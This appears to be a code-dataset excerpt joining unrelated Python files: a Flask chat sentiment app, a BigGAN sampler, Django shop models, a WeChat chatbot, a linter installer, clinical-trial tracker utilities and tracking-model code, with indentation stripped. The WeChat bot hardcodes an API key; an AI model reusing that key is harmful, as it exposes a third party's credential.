def diconnected():
"""Print disconnected if any one connects to the website"""
print('Disconnected')
@socketio.on('messaging')
def handle_message(data):
"""Socket's first real listener event when a user sends a message in chat.
So save the user message if the user is active, and return the polarity of
the message input along with the time stamp as a string dictionary in data under event called "new line" """
print('new line', data)
data = json.loads(data)
#Save the incoming messages into General_chat table
if data['username']:
latest_entry = crud.save_chat_message(data)
comp_or_neg = crud.save_nlp(data, latest_entry.chatID)
data['polarity'] = comp_or_neg
data['timestamp'] = latest_entry.timestamp.strftime('%b-%d-%y %H:%M')
emit('new line',data, broadcast=True)
@socketio.on('health')
def handle_plant_health(data):
""" Front end will send back the live chat's pos/neg counts. Server to send back the appropriate pic back to all connected users"""
count_dict = crud.get_ratio(data)
pic = crud.get_plant_health(count_dict)
emit('my_image', {'plant_pic': "plant_pic", 'pic': pic})
##### USER LOGIN, LOGOUT, EDIT PASSWORD, CHECK MESSAGE SENTIMENT routes ######
def check_if_logged_in():
"""Check if the user was already logged in"""
if current_user.is_authenticated:
return redirect("index.html")
@app.route('/login', methods= ['POST', 'GET'])
def login():
"""login with credentials"""
check_if_logged_in()
form = LoginForm(request.form)
if form.validate_on_submit():
username = form.username.data
password = form.password.data
user = crud.login_check(username, password)
#if user is returned then success!
if user is None:
flash('Invalid username or password', 'flash')
return redirect('/login')
login_user(user)
return redirect('/')
return render_template("login.html", form=form)
@app.route('/register', methods=['POST', 'GET'])
def register_user():
"""Create a new user."""
check_if_logged_in()
form = RegisterForm(request.form)
if form.validate_on_submit():
username =form.username.data
password= form.password.data
new_user = crud.create_user(username,password)
return redirect("/login")
return render_template("register.html", form=form)
@app.route('/edit_profile', methods=["GET", "POST"])
@login_required
def change_password():
"""Change Password by checking if hashed passwords matches and return errors or sucess message """
form = UserprofileForm()
if form.validate_on_submit():
username = current_user.username
user = crud.login_check(username, form.password.data)
#Checking if the current password is right
if user:
user.set_password(form.new_password.data)
db.session.commit()
flash("New Password Saved!")
else:
flash("Wrong credentials")
elif request.method == "GET":
#Return back the username into the form
form.username.data = current_user.username
return render_template("profile.html", form = form)
@app.route('/logout')
def logout():
"""Log out using flask login lib"""
crud.login_track(current_user.username)
logout_user()
return redirect("/")
@app.route('/analyze')
def analyze_page():
"""This page will render different information for current users vs new users"""
form = WordsForm()
if current_user.is_authenticated:
latest_messages = NLP.query.options(db.joinedload(NLP.chat)).filter_by(userID=current_user.id).order_by(NLP.chatID.desc()).limit(5)
earliest_messages = NLP.query.options(db.joinedload(NLP.chat)).filter_by(userID=current_user.id).order_by(NLP.chatID).limit(5)
#list of messages selected from DB
return render_template("analyze.html", latest_messages=latest_messages, earliest_messages=earliest_messages, form=form)
else:
all_latest_messages = NLP.query.options(db.joinedload(NLP.chat),db.joinedload(NLP.user)).order_by(NLP.chatID.desc()).limit(5)
all_earliest_messages = NLP.query.options(db.joinedload(NLP.chat),db.joinedload(NLP.user)).order_by(NLP.chatID).limit(5)
return render_template("analyze.html", latest_messages=all_latest_messages , earliest_messages=all_earliest_messages, form=form)
##### AJAX CALL HANDLER from Sentiment Analysis form ######
@app.route('/getPolarity', methods=["POST"])
def sentiment_form():
"""From the AJAX request from chatty.js, return var answer as a dictionary with the results
"""
form = WordsForm()
quest = form.data.get('analysis')
text = form.data.get('text')
if form.validate_on_submit():
print('Someone is trying the analyzer!')
result = crud.print_polarity_from_input(quest,text)
#if the chosen analysis is "PAT", result would comback as a float else would come out Sentiment class from Naive
if not isinstance(result, float):
# ex)Sentiment(classification='pos', p_pos=0.5702702702702702, p_neg=0.4297297297297299)
answer = crud.break_down_naive(result)
return jsonify(answer)
else:
answer = crud.print_pos_neg(result)
return jsonify({'class':answer, 'polarity':result})
return jsonify(data=form.errors)
connect_to_db(app)
db.create_all()
if __name__ == '__main__':
db.create_all()
socketio.run(app, host='0.0.0.0')
#To get into debug mode locally
# socketio.run(app, host='0.0.0.0', debug=True)
```
|
{
"source": "jeehyun100/biggan_torch",
"score": 2
}
|
#### File: jeehyun100/biggan_torch/sample_generator_img.py
```python
import functools
import math
import numpy as np
from tqdm import tqdm, trange
import torch
import torch.nn as nn
from torch.nn import init
import torch.optim as optim
import torch.nn.functional as F
from torch.nn import Parameter as P
import torchvision
# Import my stuff
import inception_utils
import utils
import losses
def run(config):
# Prepare state dict, which holds things like epoch # and itr #
state_dict = {'itr': 0, 'epoch': 0, 'save_num': 0, 'save_best_num': 0,
'best_IS': 0, 'best_FID': 999999, 'config': config}
# Optionally, get the configuration from the state dict. This allows for
# recovery of the config provided only a state dict and experiment name,
# and can be convenient for writing less verbose sample shell scripts.
if config['config_from_name']:
utils.load_weights(None, None, state_dict, config['weights_root'],
config['experiment_name'], config['load_weights'], None,
strict=False, load_optim=False)
# Ignore items which we might want to overwrite from the command line
for item in state_dict['config']:
if item not in ['z_var', 'base_root', 'batch_size', 'G_batch_size', 'use_ema', 'G_eval_mode']:
config[item] = state_dict['config'][item]
# update config (see train.py for explanation)
config['resolution'] = utils.imsize_dict[config['dataset']]
config['n_classes'] = utils.nclass_dict[config['dataset']]
config['G_activation'] = utils.activation_dict[config['G_nl']]
config['D_activation'] = utils.activation_dict[config['D_nl']]
config = utils.update_config_roots(config)
config['skip_init'] = True
config['no_optim'] = True
device = 'cuda'
# Seed RNG
utils.seed_rng(config['seed'])
# Setup cudnn.benchmark for free speed
torch.backends.cudnn.benchmark = True
# Import the model--this line allows us to dynamically select different files.
model = __import__(config['model'])
experiment_name = (config['experiment_name'] if config['experiment_name']
else utils.name_from_config(config))
print('Experiment name is %s' % experiment_name)
G = model.Generator(**config).cuda()
utils.count_parameters(G)
# Load weights
print('Loading weights...')
state_dict = None
# Here is where we deal with the ema--load ema weights or load normal weights
utils.load_weights(G if not (config['use_ema']) else None, None, state_dict,
config['weights_root'], experiment_name, config['load_weights'],
G if config['ema'] and config['use_ema'] else None,
strict=False, load_optim=False)
# Update batch size setting used for G
G_batch_size = max(config['G_batch_size'], config['batch_size'])
z_, y_ = utils.prepare_z_y(G_batch_size, G.dim_z, config['n_classes'],
device=device, fp16=config['G_fp16'],
z_var=config['z_var'])
if config['G_eval_mode']:
print('Putting G in eval mode..')
G.eval()
else:
print('G is in %s mode...' % ('training' if G.training else 'eval'))
#Sample function
sample = functools.partial(utils.sample, G=G, z_=z_, y_=y_, config=config)
if config['accumulate_stats']:
print('Accumulating standing stats across %d accumulations...' % config['num_standing_accumulations'])
utils.accumulate_standing_stats(G, z_, y_, config['n_classes'],
config['num_standing_accumulations'])
# Sample a number of images and save them to an NPZ, for use with TF-Inception
if config['sample_npz']:
# Lists to hold images and labels for images
x, y = [], []
print('Sampling %d images and saving them to npz...' % config['sample_num_npz'])
for i in trange(int(np.ceil(config['sample_num_npz'] / float(G_batch_size)))):
with torch.no_grad():
images, labels = sample()
x += [np.uint8(255 * (images.cpu().numpy() + 1) / 2.)]
y += [labels.cpu().numpy()]
x = np.concatenate(x, 0)[:config['sample_num_npz']]
y = np.concatenate(y, 0)[:config['sample_num_npz']]
print('Images shape: %s, Labels shape: %s' % (x.shape, y.shape))
npz_filename = '%s/%s/samples.npz' % (config['samples_root'], experiment_name)
print('Saving npz to %s...' % npz_filename)
np.savez(npz_filename, **{'x' : x, 'y' : y})
# Prepare sample sheets
if config['sample_sheets']:
print('Preparing conditional sample sheets...')
utils.sample_sheet(G, classes_per_sheet=utils.classes_per_sheet_dict[config['dataset']],
num_classes=config['n_classes'],
samples_per_class=10, parallel=config['parallel'],
samples_root=config['samples_root'],
experiment_name=experiment_name,
folder_number=config['sample_sheet_folder_num'],
z_=z_,)
# Sample interp sheets
if config['sample_interps']:
print('Preparing interp sheets...')
for fix_z, fix_y in zip([False, False, True], [False, True, False]):
utils.interp_sheet(G, num_per_sheet=16, num_midpoints=8,
num_classes=config['n_classes'],
parallel=config['parallel'],
samples_root=config['samples_root'],
experiment_name=experiment_name,
folder_number=config['sample_sheet_folder_num'],
sheet_number=0,
fix_z=fix_z, fix_y=fix_y, device='cuda')
# Sample random sheet
if config['sample_random']:
print('Preparing random sample sheet...')
images, labels = sample()
torchvision.utils.save_image(images.float(),
'%s/%s/random_samples.jpg' % (config['samples_root'], experiment_name),
nrow=int(G_batch_size**0.5),
normalize=True)
# Get Inception Score and FID
get_inception_metrics = inception_utils.prepare_inception_metrics(config['dataset'], config['parallel'], config['no_fid'])
# Prepare a simple function get metrics that we use for trunc curves
def get_metrics():
sample = functools.partial(utils.sample, G=G, z_=z_, y_=y_, config=config)
IS_mean, IS_std, FID = get_inception_metrics(sample, config['num_inception_images'], num_splits=10, prints=False)
# Prepare output string
outstring = 'Using %s weights ' % ('ema' if config['use_ema'] else 'non-ema')
outstring += 'in %s mode, ' % ('eval' if config['G_eval_mode'] else 'training')
outstring += 'with noise variance %3.3f, ' % z_.var
outstring += 'over %d images, ' % config['num_inception_images']
if config['accumulate_stats'] or not config['G_eval_mode']:
outstring += 'with batch size %d, ' % G_batch_size
if config['accumulate_stats']:
outstring += 'using %d standing stat accumulations, ' % config['num_standing_accumulations']
outstring += 'Itr %d: PYTORCH UNOFFICIAL Inception Score is %3.3f +/- %3.3f, PYTORCH UNOFFICIAL FID is %5.4f' % (state_dict['itr'], IS_mean, IS_std, FID)
print(outstring)
if config['sample_inception_metrics']:
print('Calculating Inception metrics...')
get_metrics()
# Sample truncation curve stuff. This is basically the same as the inception metrics code
if config['sample_trunc_curves']:
start, step, end = [float(item) for item in config['sample_trunc_curves'].split('_')]
print('Getting truncation values for variance in range (%3.3f:%3.3f:%3.3f)...' % (start, step, end))
for var in np.arange(start, end + step, step):
z_.var = var
# Optionally comment this out if you want to run with standing stats
# accumulated at one z variance setting
if config['accumulate_stats']:
utils.accumulate_standing_stats(G, z_, y_, config['n_classes'],
config['num_standing_accumulations'])
get_metrics()
def main():
# parse command line and run
parser = utils.prepare_parser()
parser = utils.add_sample_parser(parser)
config = vars(parser.parse_args())
print(config)
run(config)
if __name__ == '__main__':
main()
```
|
{
"source": "JeeHyungPark/Django-shoppingmall",
"score": 2
}
|
#### File: Django-shoppingmall/shop/models.py
```python
from django.db import models
from django.urls import reverse
class Category(models.Model): #제품 카테고리 모델
name = models.CharField(max_length=200, db_index=True) #카테고리이름을 db에서 index값으로 설정
meta_description = models.TextField(blank=True)
slug = models.SlugField(max_length=200, db_index=True, unique=True, allow_unicode=True)
#slug => 글번호를 이용하는 것이 아닌, 상품명 등을 이용해서 url을 만드는 방식
class Meta:
ordering = ['name']
verbose_name = 'category'
verbose_name_plural = 'categories'
def __str__(self):
return self.name
def get_absolute_url(self): #객체 추가/수정에 대한 기본 반환주소를 반환
return reverse('shop:product_in_category', args=[self.slug])
#reverse함수 => 되돌아갈 페이지의 패턴 이름이 shop app의 product_in_category,
#args => 여러 값들을 리스트로 전달하는데 사용(url을 만드는데에 필요한 pk)
class Product(models.Model): #제품 모델
category = models.ForeignKey(Category, on_delete=models.SET_NULL, null=True, related_name='products')
# ForeignKey를 사용하여 카테고리 모델과 관계를 만듬, 카테고리가 삭제되어도 상품은 남아있기 위해 on_delete=SET_NULL
name = models.CharField(max_length=200, db_index=True)
slug = models.SlugField(max_length=200, db_index=True, unique=True, allow_unicode=True)
image = models.ImageField(upload_to='../products/%Y/%m/%d', blank=True) #image에 빈칸 허용하는거 아닌가? 왜 사진 안넣으면 메인페이지 에러 나지 ㅠ
description = models.TextField(blank=True)
meta_description = models.TextField(blank=True)
price = models.DecimalField(max_digits=10, decimal_places=2)
stock = models.PositiveIntegerField()
available_display = models.BooleanField('Display', default=True)
available_order = models.BooleanField('Order', default=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ['-created']
index_together = [['id','slug']] #멀티 컬럼 색인 기능 / id와 slug 필드를 묶어서 색인이 가능하도록
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('shop:product_detail', args=[self.id, self.slug])
```
|
{
"source": "jeeinn/wechat-web-robot",
"score": 3
}
|
#### File: jeeinn/wechat-web-robot/bot_v0.0.2.py
```python
import requests
import json, re
import itchat
from itchat.content import *
'''
0.0.2版本
功能:
2.私聊智能回复
1.匹配群聊关键字 说 ,然后回复接受到的消息
'''
KEY = '8edce3ce905a4c1dbb965e6b35c3834d'
# 图灵机器人
def get_tuling_res(msg):
# 构造了要发送给服务器的数据
apiUrl = 'http://www.tuling123.com/openapi/api'
data = {
'key' : KEY,
'info' : msg,
'userid' : 'wechat-robot',
}
try:
r = requests.post(apiUrl, data=data).json()
# 字典的get方法在字典没有'text'值的时候会返回None而不会抛出异常
return r.get('text')
# 防止服务器无响应导致程序异常,用try-except捕获
except:
return u'我不和你私聊!'
# 智能私聊
@itchat.msg_register(itchat.content.TEXT)
def tuling_reply(msg):
defaultReply = u'我不和你私聊!'
reply = get_tuling_res(msg['Text'])
nick_name = msg['FromUserName']
user_info = itchat.search_friends(userName=nick_name)
if user_info:
nick_name = user_info[u'NickName']
print('%s:%s'%(nick_name,msg['Text']))
return reply or defaultReply
# 群聊监控
@itchat.msg_register(TEXT, isGroupChat = True)
def groupchat_reply(msg):
room_name = itchat.search_chatrooms(userName=msg[u'FromUserName'])
print(u"来自-%s-群聊消息|%s:%s"%(room_name[ u'NickName'],msg['ActualNickName'],msg['Text']))
# 匹配说关键字
if(re.match(u'^说', msg['Text'])):
itchat.send_msg(msg['Text'].replace(u'说', ''),msg[u'FromUserName'])
itchat.auto_login(hotReload=True,enableCmdQR=True)
itchat.run(debug=True)
```
|
{
"source": "jeejakp12/pytorch",
"score": 2
}
|
#### File: linter/adapters/pip_init.py
```python
import os
import argparse
import logging
import subprocess
import sys
import time
from typing import List
def run_command(args: List[str]) -> "subprocess.CompletedProcess[bytes]":
logging.debug("$ %s", " ".join(args))
start_time = time.monotonic()
try:
return subprocess.run(args, check=True)
finally:
end_time = time.monotonic()
logging.debug("took %dms", (end_time - start_time) * 1000)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="pip initializer")
parser.add_argument(
"packages",
nargs="+",
help="pip packages to install",
)
parser.add_argument(
"--verbose",
action="store_true",
help="verbose logging",
)
parser.add_argument(
"--dry-run", help="do not install anything, just print what would be done."
)
args = parser.parse_args()
logging.basicConfig(
format="<%(threadName)s:%(levelname)s> %(message)s",
level=logging.NOTSET if args.verbose else logging.DEBUG,
stream=sys.stderr,
)
for package in args.packages:
package_name, _, version = package.partition("=")
if version == "":
raise RuntimeError(
"Package {package_name} did not have a version specified. "
"Please specify a version to product a consistent linting experience."
)
pip_args = ["pip3", "install"]
# If we are in a global install, use `--user` to install so that you do not
# need root access in order to initialize linters.
#
# However, `pip install --user` interacts poorly with virtualenvs (see:
# https://bit.ly/3vD4kvl) and conda (see: https://bit.ly/3KG7ZfU). So in
# these cases perform a regular installation.
in_conda = os.environ.get("CONDA_PREFIX") is not None
in_virtualenv = os.environ.get("VIRTUAL_ENV") is not None
if not in_conda and not in_virtualenv:
pip_args.append("--user")
pip_args.extend(args.packages)
dry_run = args.dry_run == "1"
if dry_run:
print(f"Would have run: {pip_args}")
sys.exit(0)
run_command(pip_args)
```
|
{
"source": "jeekim/euctr-tracker-code",
"score": 2
}
|
#### File: crawl/base/fields.py
```python
import sqlalchemy as sa
from scrapy import Field
from six import add_metaclass
from abc import ABCMeta, abstractmethod
from sqlalchemy.dialects.postgresql import ARRAY, JSONB
from . import helpers
@add_metaclass(ABCMeta)
class Base(Field):
# Public
def __init__(self, primary_key=False):
self.__primary_key = primary_key
def __repr__(self):
return type(self).__name__
@property
@abstractmethod
def column_type(self):
pass # pragma: no cover
@property
def primary_key(self):
return self.__primary_key
def parse(self, value):
return value
class Text(Base):
# Public
column_type = sa.Text
class Integer(Base):
# Public
column_type = sa.Integer
def parse(self, value):
if value is None:
return None
return int(value)
class Boolean(Base):
# Public
column_type = sa.Boolean
def __init__(self, true_value=None, **params):
super(Boolean, self).__init__(**params)
self.__true_value = true_value
def parse(self, value):
if value is None:
return None
if self.__true_value is not None:
value = (value.lower() == self.__true_value.lower())
return value
class Date(Base):
# Public
column_type = sa.Date
def __init__(self, formats, **params):
super(Date, self).__init__(**params)
if not isinstance(formats, (list, tuple)):
formats = [formats]
self.__formats = formats
def parse(self, value):
if value is None:
return None
for i, fmt in enumerate(self.__formats):
try:
return helpers.parse_date(value, format=fmt)
except ValueError:
pass
msg = "time data '{value}' doesn't match any of the formats: {formats}"
raise ValueError(msg.format(value=value, formats=self.__formats))
class Datetime(Base):
# Public
column_type = sa.DateTime(timezone=True)
def __init__(self, format=None, **params):
super(Datetime, self).__init__(**params)
self.__format = format
def parse(self, value):
if value is None:
return None
if self.__format is not None:
value = helpers.parse_datetime(value, format=self.__format)
return value
class Json(Base):
# Public
column_type = JSONB
class Array(Base):
# Public
def __init__(self, field=None, **params):
super(Array, self).__init__(**params)
if field is None:
field = Text()
self.__field = field
self.__column_type = ARRAY(field.column_type)
@property
def column_type(self):
return self.__column_type
def parse(self, value):
if value is None:
return None
result = []
for item in value:
result.append(self._field.parse(item))
return result
```
#### File: crawl/base/record.py
```python
import uuid
import scrapy
import logging
from abc import abstractmethod
from . import config
from . import fields
logger = logging.getLogger(__name__)
# Module API
class Record(scrapy.Item):
# Public
def __repr__(self):
template = '<%s: %s>'
text = template % (self.table.upper(), self.get(self.__primary_key))
return text
@property
@abstractmethod
def table(self):
"""Source name.
"""
pass # pragma: no cover
@classmethod
def create(cls, source, data):
# Init dict
self = cls()
# Get primary_key
self.__primary_key = None
for key, field in self.fields.items():
if field.primary_key:
self.__primary_key = key
break
if self.__primary_key is None:
raise TypeError('Record %s requires primary key' % cls)
if not isinstance(self.fields[self.__primary_key], fields.Text):
raise TypeError('Record %s requires text primary key' % cls)
# Get column types
self.__column_types = {}
for key, field in self.fields.items():
self.__column_types[key] = field.column_type
# Check for existence of fields not defined in our schema
undefined = []
for key, value in data.items():
field = self.fields.get(key)
if field is None:
undefined.append(key)
continue
for key in undefined:
logger.warning('Undefined field: %s - %s' % (self, key))
# Set values for everything that is in our schema
for key, value in self.fields.items():
if not key.startswith('meta_'):
d = value.parse(data.get(key, None))
self[key] = d
# Add metadata
ident = uuid.uuid1().hex
self.fields['meta_id'] = fields.Text()
self.fields['meta_source'] = fields.Text()
self.fields['meta_created'] = fields.Datetime()
self.fields['meta_updated'] = fields.Datetime()
self['meta_id'] = ident
self['meta_source'] = source
return self
def write(self, conf, conn):
"""Write record to warehouse.
Args:
conf (dict): config dictionary
conn (dict): connections dictionary
"""
db = conn['warehouse']
if self.table not in db.tables:
if conf['ENV'] in ['development', 'testing']:
table = db.create_table(
self.table,
primary_id=self.__primary_key,
primary_type=fields.Text.column_type)
# work around a bug whereby the table is not persisted
table.table
table = db[self.table]
action = 'created'
if table.find_one(**{self.__primary_key: self[self.__primary_key]}):
action = 'updated'
del self['meta_id']
ensure_fields = False
if conf['ENV'] in ['development', 'testing']:
ensure_fields = True
table.upsert(self, [self.__primary_key], ensure=ensure_fields, types=self.__column_types)
logger.debug('Record - %s: %s - %s fields', action, self, len(self))
```
#### File: management/commands/raw_trials_to_cloud.py
```python
import datetime
import os
import subprocess
import tempfile
from google.cloud import storage
import psycopg2
from django.core.management.base import BaseCommand
def _safe_filename(filename):
"""
Generates a safe filename that is unlikely to collide with existing objects
in Google Cloud Storage.
``filename.ext`` is transformed into ``filename-YYYY-MM-DD-HHMMSS.ext``
"""
now = datetime.datetime.utcnow().strftime("%Y-%m-%d-%H%M%S")
basename, extension = filename.rsplit('.', 1)
return "{0}-{1}.{2}".format(basename, now, extension)
def upload_file(filename_to_upload):
"""
Uploads a file to a given Cloud Storage bucket and returns the public url
to the new object.
"""
# "crentials" are JSON credentials for a Google Cloud service
# account that has a Storage Object Admin role.
target_filename = _safe_filename("euctr_dump.csv")
subprocess.check_output(
[
"gsutil",
"-o",
"Credentials:gs_service_key_file=/home/seb/euctr-backup-credentials-036e81c59878.json",
"cp",
filename_to_upload,
"gs://ebmdatalab/euctr/{}".format(target_filename),
]
)
class Command(BaseCommand):
help = ('Fetches trials data from OpenTrials PostgredSQL database and '
'saves to trials.csv')
def handle(self, *args, **options):
opentrials_db = os.environ['EUCTR_OPENTRIALS_DB']
conn = psycopg2.connect(opentrials_db)
cur = conn.cursor()
query = "COPY euctr TO STDOUT DELIMITER ',' CSV HEADER;"
fname = os.path.join(tempfile.gettempdir(), 'euctr_dump.csv')
# `touch` the file. This is so we can open it in `r+b` mode to
# work around a google-bigquery-python bug
with open(fname, 'a'):
os.utime(fname, None)
with open(fname, 'r+b') as f:
cur.copy_expert(query, f)
upload_file(fname)
```
#### File: frontend/templatetags/bar_chart.py
```python
import django
import math
register = django.template.Library()
def calc_bar(value, *args):
"""Calculate percentage of value out of the maximum
of several values, for making a bar chart."""
top = max(args + (value,))
percent = value / top * 100
return percent
def calc_mid_bar(value1, value2, *args):
"""Calculate percentage of value out of the maximum
of several values, for making a bar chart. Return
the midpoint between the height of the first and second
parameter."""
top = max(args + (value1, value2))
percent = (value1 + value2) / 2 / top * 100
return percent
register.simple_tag(calc_bar)
register.simple_tag(calc_mid_bar)
```
#### File: frontend/templatetags/render_nan.py
```python
import django
import math
register = django.template.Library()
def default_if_nan(value, default):
"""Converts numbers which are NaN (not a number) to string"""
if math.isnan(value):
return default
return value
def default_if_invalid(value, default):
"""Converts numbers which are None or NaN (not a number) to string"""
if value is None or (isinstance(value, float) and math.isnan(value)):
return default
return value
def custom_percent(value):
"""Display a number with a percent after it, or a dash if not valid"""
if math.isnan(value):
return "-"
return str(value) + "%"
register.filter('default_if_nan', default_if_nan)
register.filter('default_if_invalid', default_if_invalid)
register.filter('custom_percent', custom_percent)
```
#### File: euctr/frontend/views.py
```python
import logging
import time
import atexit
import signal
from django.shortcuts import render
from django.conf import settings
from django.core.urlresolvers import reverse
from django.http import HttpResponse
import selenium.webdriver
from . import models
selenium_driver = None
def quit_selenium():
selenium_driver.service.process.send_signal(signal.SIGTERM)
selenium_driver.quit()
def _capture_screenshot(width, url):
global selenium_driver
if not selenium_driver:
selenium_driver = selenium.webdriver.PhantomJS()
atexit.register(quit_selenium)
selenium_driver.set_window_size(width, 100)
selenium_driver.get(url)
png_binary = selenium_driver.get_screenshot_as_png()
return HttpResponse(png_binary, 'image/png')
#############################################################################
# Index page
def index(request):
context = models.get_headlines()
context['showing_all_sponsors'] = 'all' in request.GET
context['activate_search'] = 'search' in request.GET
if context['activate_search']:
context['showing_all_sponsors'] = True
if context['showing_all_sponsors']:
context['sponsors'] = models.get_all_sponsors()
else:
context['sponsors'] = models.get_major_sponsors()
context['load_js_at_start'] = True
context['social_image'] = request.build_absolute_uri(
reverse("index_screenshot_png")
)
return render(request, "index.html", context=context)
def index_screenshot(request):
context = models.get_headlines().copy()
context['taking_screenshot'] = True
return render(request, "index_screenshot.html", context=context)
def index_screenshot_png(request):
return _capture_screenshot(1024, request.build_absolute_uri(
reverse("index_screenshot"))
)
#############################################################################
# Sponsor page
def sponsor(request, slug):
return _sponsor(request, slug, "sponsor.html", False)
def sponsor_screenshot(request, slug):
return _sponsor(request, slug, "sponsor_screenshot.html", True)
def _sponsor(request, slug, template_name, taking_screenshot):
context = models.get_sponsor(slug).copy()
context['trials'] = models.get_trials(slug)
context['load_js_at_start'] = True
context['taking_screenshot'] = taking_screenshot
if not taking_screenshot:
context['social_image'] = request.build_absolute_uri(
reverse("sponsor_screenshot_png", kwargs={"slug": slug})
)
return render(request, template_name, context=context)
def sponsor_screenshot_png(request, slug):
return _capture_screenshot(1024, request.build_absolute_uri(
reverse("sponsor_screenshot", kwargs={"slug": slug}))
)
#############################################################################
# Static pages
def about(request):
context = models.get_headlines()
context['social_image'] = request.build_absolute_uri(
reverse("index_screenshot_png")
)
return render(request, "about.html", context=context)
def fund(request):
return render(request, "fund.html")
```
|
{
"source": "Jee-King/FENet-",
"score": 2
}
|
#### File: models/stark/stark_s.py
```python
import torch
from torch import nn
from lib.utils.misc import NestedTensor
from .backbone import build_backbone
from .convlstm_qkv import ConvLSTM_qkv
from .counter_guide import Counter_Guide
from .transformer import build_transformer
from .head import build_box_head
from lib.utils.box_ops import box_xyxy_to_cxcywh
class STARKS(nn.Module):
""" This is the base class for Transformer Tracking """
def __init__(self, backbone, qkv, counter_guide, transformer, box_head, num_queries,
aux_loss=False, head_type="CORNER"):
""" Initializes the model.
Parameters:
backbone: torch module of the backbone to be used. See backbone.py
transformer: torch module of the transformer architecture. See transformer.py
num_queries: number of object queries.
aux_loss: True if auxiliary decoding losses (loss at each decoder layer) are to be used.
"""
super().__init__()
self.backbone = backbone
self.qkv = qkv
self.counter_guide = counter_guide
self.transformer = transformer
self.box_head = box_head
self.num_queries = num_queries
hidden_dim = transformer.d_model
self.query_embed = nn.Embedding(num_queries, hidden_dim) # object queries
self.bottleneck = nn.Conv2d(backbone.num_channels, hidden_dim, kernel_size=1) # the bottleneck layer
self.aux_loss = aux_loss
self.head_type = head_type
if head_type == "CORNER":
self.feat_sz_s = int(box_head.feat_sz)
self.feat_len_s = int(box_head.feat_sz ** 2)
def forward(self, img=None, events=None, seq_dict=None, mode="backbone", run_box_head=True, run_cls_head=False):
if mode == "backbone":
return self.forward_backbone(img, events)
elif mode == "transformer":
return self.forward_transformer(seq_dict, run_box_head=run_box_head, run_cls_head=run_cls_head)
else:
raise ValueError
def forward_backbone(self, input: NestedTensor, events):
"""The input type is NestedTensor, which consists of:
- tensor: batched images, of shape [batch_size x 3 x H x W]
- mask: a binary mask of shape [batch_size x H x W], containing 1 on padded pixels
"""
assert isinstance(input, NestedTensor)
# Forward the backbone
output_back, pos = self.backbone(input) # features & masks, position embedding for the search
out_event = self.qkv(events[0], events[1], events[2])
fused_feature = self.counter_guide(output_back[0].tensors, out_event)
output_back[0].tensors = fused_feature
# Adjust the shapes
return self.adjust(output_back, pos)
def forward_transformer(self, seq_dict, run_box_head=True, run_cls_head=False):
if self.aux_loss:
raise ValueError("Deep supervision is not supported.")
# Forward the transformer encoder and decoder
output_embed, enc_mem = self.transformer(seq_dict["feat"], seq_dict["mask"], self.query_embed.weight,
seq_dict["pos"], return_encoder_output=True)
# Forward the corner head
out, outputs_coord = self.forward_box_head(output_embed, enc_mem)
return out, outputs_coord, output_embed
def forward_box_head(self, hs, memory):
"""
hs: output embeddings (1, B, N, C)
memory: encoder embeddings (HW1+HW2, B, C)"""
if self.head_type == "CORNER":
# adjust shape
enc_opt = memory[-self.feat_len_s:].transpose(0, 1) # encoder output for the search region (B, HW, C)
dec_opt = hs.squeeze(0).transpose(1, 2) # (B, C, N)
att = torch.matmul(enc_opt, dec_opt) # (B, HW, N)
opt = (enc_opt.unsqueeze(-1) * att.unsqueeze(-2)).permute((0, 3, 2, 1)).contiguous() # (B, HW, C, N) --> (B, N, C, HW)
bs, Nq, C, HW = opt.size()
opt_feat = opt.view(-1, C, self.feat_sz_s, self.feat_sz_s)
# run the corner head
outputs_coord = box_xyxy_to_cxcywh(self.box_head(opt_feat))
outputs_coord_new = outputs_coord.view(bs, Nq, 4)
out = {'pred_boxes': outputs_coord_new}
return out, outputs_coord_new
elif self.head_type == "MLP":
# Forward the class and box head
outputs_coord = self.box_head(hs).sigmoid()
out = {'pred_boxes': outputs_coord[-1]}
if self.aux_loss:
out['aux_outputs'] = self._set_aux_loss(outputs_coord)
return out, outputs_coord
def adjust(self, output_back: list, pos_embed: list):
"""
"""
src_feat, mask = output_back[-1].decompose()
assert mask is not None
# reduce channel
feat = self.bottleneck(src_feat) # (B, C, H, W)
# adjust shapes
feat_vec = feat.flatten(2).permute(2, 0, 1) # HWxBxC
pos_embed_vec = pos_embed[-1].flatten(2).permute(2, 0, 1) # HWxBxC
mask_vec = mask.flatten(1) # BxHW
return {"feat": feat_vec, "mask": mask_vec, "pos": pos_embed_vec}
@torch.jit.unused
def _set_aux_loss(self, outputs_coord):
# this is a workaround to make torchscript happy, as torchscript
# doesn't support dictionary with non-homogeneous values, such
# as a dict having both a Tensor and a list.
return [{'pred_boxes': b}
for b in outputs_coord[:-1]]
def build_starks(cfg):
backbone = build_backbone(cfg) # backbone and positional encoding are built together
qkv = ConvLSTM_qkv(input_dim=3,
hidden_dim=[32,32],
kernel_size=(3, 3),
num_layers=2,
batch_first=True,
bias=True,
return_all_layers=False)
counter_guide = Counter_Guide()
transformer = build_transformer(cfg)
box_head = build_box_head(cfg)
model = STARKS(
backbone,
qkv,
counter_guide,
transformer,
box_head,
num_queries=cfg.MODEL.NUM_OBJECT_QUERIES,
aux_loss=cfg.TRAIN.DEEP_SUPERVISION,
head_type=cfg.MODEL.HEAD_TYPE
)
return model
```
#### File: test/evaluation/local.py
```python
from lib.test.evaluation.environment import EnvSettings
def local_env_settings():
settings = EnvSettings()
# Set your local paths here.
settings.davis_dir = ''
settings.got10k_path = ''
settings.got_packed_results_path = ''
settings.got_reports_path = ''
settings.lasot_path = ''
settings.eotb_path = '/home/iccd/data/img_ext/'
settings.network_path = '/home/iccd/data/checkpoints/train/stark_s/baseline/' # Where tracking networks are stored.
settings.nfs_path = ''
settings.otb_path = ''
settings.result_plot_path = '/home/iccd/Documents/Stark-fusion/lib/test/result_plots/'
settings.results_path = '/home/iccd/Documents/Stark-fusion/lib/test/tracking_results/' # Where to store tracking results
settings.segmentation_path = '/home/iccd/Documents/Stark-fusion/lib/test/segmentation_results/'
settings.tn_packed_results_path = ''
settings.tpl_path = ''
settings.trackingnet_path = ''
settings.uav_path = ''
settings.vot_path = ''
settings.youtubevos_dir = ''
return settings
```
#### File: parameter/transt/transt50.py
```python
from pytracking.utils import TrackerParams
from pytracking.features.net_wrappers import NetWithBackbone
def parameters(netepoch=None):
params = TrackerParams()
params.debug = 0
params.visualization = False
params.use_gpu = True
params.net = NetWithBackbone(net_path=netepoch,
use_gpu=params.use_gpu)
